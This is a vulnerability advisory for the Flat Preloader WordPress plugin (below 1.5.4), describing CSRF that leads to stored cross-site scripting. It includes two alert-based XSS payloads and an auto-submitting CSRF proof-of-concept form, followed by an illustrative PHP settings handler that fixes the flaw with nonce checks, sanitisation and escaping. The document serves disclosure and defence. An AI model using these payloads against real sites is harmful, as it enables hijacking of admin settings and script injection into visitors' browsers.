wpexploit | apple502j | WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F
History: Sep 28, 2021 - 12:00 a.m.

Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting


EPSS: 0.001 (Low), Percentile: 33.4%

The plugin does not enforce nonce checks when saving its settings, and does not sanitise or escape them either, which could allow attackers to make a logged-in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload). The CSRF was fixed in 1.5.1; further sanitisation was done in v1.5.2 to 1.5.4.

Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>
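The two defects the advisory describes, a settings save with no nonce check and values stored and printed without sanitisation or escaping, are closed in the WordPress settings handler below. This is an added illustrative example, not the Flat Preloader plugin's own code; the function names, the `fp_example_preloader` option, the `fp-example` page slug and the nonce action/field names are assumptions chosen for the example, while the field names mirror the form in the advisory.

```php
<?php
// Added example (not the plugin's code): a settings save handler that rejects
// cross-site submissions with a nonce check, sanitises every field on input and
// escapes the stored values on output. Option name, page slug, nonce action and
// function names are assumptions for this example.

// Handles the POST from the settings page. Hooked on admin_init so it runs before output.
function fp_example_save_settings() {
    // Only act on an actual submit of this form.
    if ( ! isset( $_POST['save-option'] ) ) {
        return;
    }
    // Capability check: only users allowed to manage options may save them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'fp-example' ) );
    }
    // CSRF defence: check_admin_referer() verifies the nonce emitted by
    // wp_nonce_field() below and stops with an error page when it is missing or
    // invalid, so an auto-submitted form from another origin never reaches the save.
    check_admin_referer( 'fp_example_save_settings', 'fp_example_nonce' );

    // WordPress adds slashes to $_POST; remove them before sanitising.
    $raw = ( isset( $_POST['preloader'] ) && is_array( $_POST['preloader'] ) )
        ? wp_unslash( $_POST['preloader'] )
        : array();

    // Sanitise on input: plain text for text fields, a URL for the image field,
    // a non-negative integer for the delay. Nothing HTML-like survives here.
    $clean = array(
        'alt'              => sanitize_text_field( $raw['alt'] ?? '' ),
        'text_under_icon'  => sanitize_text_field( $raw['text_under_icon'] ?? '' ),
        'custom_image_url' => esc_url_raw( $raw['custom_image_url'] ?? '' ),
        'delay_time'       => absint( $raw['delay_time'] ?? 0 ),
    );
    update_option( 'fp_example_preloader', $clean );
}
add_action( 'admin_init', 'fp_example_save_settings' );

// Renders the settings form (backend). The nonce field is what the handler above
// checks; stored values are escaped with esc_attr() before being placed in attributes.
function fp_example_render_settings_page() {
    $opts = get_option( 'fp_example_preloader', array() );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=fp-example' ) ); ?>">
        <?php wp_nonce_field( 'fp_example_save_settings', 'fp_example_nonce' ); ?>
        <input type="text" name="preloader[alt]"
               value="<?php echo esc_attr( $opts['alt'] ?? '' ); ?>">
        <input type="text" name="preloader[text_under_icon]"
               value="<?php echo esc_attr( $opts['text_under_icon'] ?? '' ); ?>">
        <input type="text" name="preloader[custom_image_url]"
               value="<?php echo esc_attr( $opts['custom_image_url'] ?? '' ); ?>">
        <input type="number" name="preloader[delay_time]"
               value="<?php echo esc_attr( $opts['delay_time'] ?? 0 ); ?>">
        <input type="submit" name="save-option" value="Save Changes">
    </form>
    <?php
}

// Renders the preloader image (frontend). Escaping on output is the second layer:
// even if a quote reached the option value, esc_attr() encodes it so the value
// cannot close the attribute and introduce new attributes or event handlers.
function fp_example_render_preloader_img() {
    $opts = get_option( 'fp_example_preloader', array() );
    printf(
        '<img src="%s" alt="%s">',
        esc_url( $opts['custom_image_url'] ?? '' ),
        esc_attr( $opts['alt'] ?? '' )
    );
}
add_action( 'wp_footer', 'fp_example_render_preloader_img' );
```

Both layers matter: the nonce check is what removes the CSRF vector the PoC relies on, while sanitising on input and escaping on output is what keeps a stored value from executing as script whether it is printed in the frontend image tag or echoed back into the backend form, which is the distinction between the two payload variants the advisory lists.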
